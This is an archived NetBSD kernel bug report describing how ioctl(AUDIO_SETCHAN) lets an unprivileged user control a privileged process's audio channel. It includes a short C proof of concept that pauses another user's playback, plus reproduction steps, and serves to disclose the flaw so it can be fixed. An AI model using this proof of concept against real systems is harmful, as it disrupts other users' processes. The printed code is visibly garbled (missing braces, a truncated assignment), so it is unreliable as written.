NetBSD-Bugs archive

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index][Old Index]

kern/52627: ioctl(AUDIO_SETCHAN) is able to affect privileged process

>Number:         52627
>Category:       kern
>Synopsis:       ioctl(AUDIO_SETCHAN) is able to affect privileged process
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Oct 18 13:30:00 +0000 2017
>Originator:     Tetsuya Isaki
>Release:        NetBSD 8.0_BETA
NetBSD 8.0_BETA i386
ioctl(AUDIO_SETCHAN) allows subsequent audio ioctls to be issued to other
virtual channels.  The virtual channel number does not have credentials
(and is predictable).
This allows unprivileged user to issue any audio ioctls to privileged
process (even if sysctl hw.<dev>.multiuser = 0).

% cat a.c
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/audioio.h>
#include <sys/ioctl.h>

int main(int ac, char *av[])
	audio_info_t ai;
	int fd;
	int r;
	int val;

	fd = open("/dev/audioctl", O_RDWR);
	if (fd == -1)
		err(1, "open");

	/* fd is virtual channel 1, so upcoming virtual channel will be 2 */
	val = 2;
	r = ioctl(fd, AUDIO_SETCHAN, &val);
	if (r == -1)
		err(1, "AUDIO_SETCHAN");

	AUDIO_INITINFO(&ai); = 1;
	for (;;) {
		r = ioctl(fd, AUDIO_SETINFO, &ai);
		if (r == -1) {
			if (errno != ENXIO)
				err(1, "AUDIO_SETINFO");

	return 0;


 (First, execute this sample code by unprivileged user)

% id -u
% gcc a.c
% ./a.out

 (Then, start playback by privileged user)

# id -u
# audioplay somemusic.wav

 (this playback pauses soon and process blocks...)

In the narrow view, virtual channel number also needs credentials? but
I don't know about security area.
In the wide view, however, I think the new audio behavior(specification)
needs more consideration before 8.0.

Home | Main Index | Thread Index | Old Index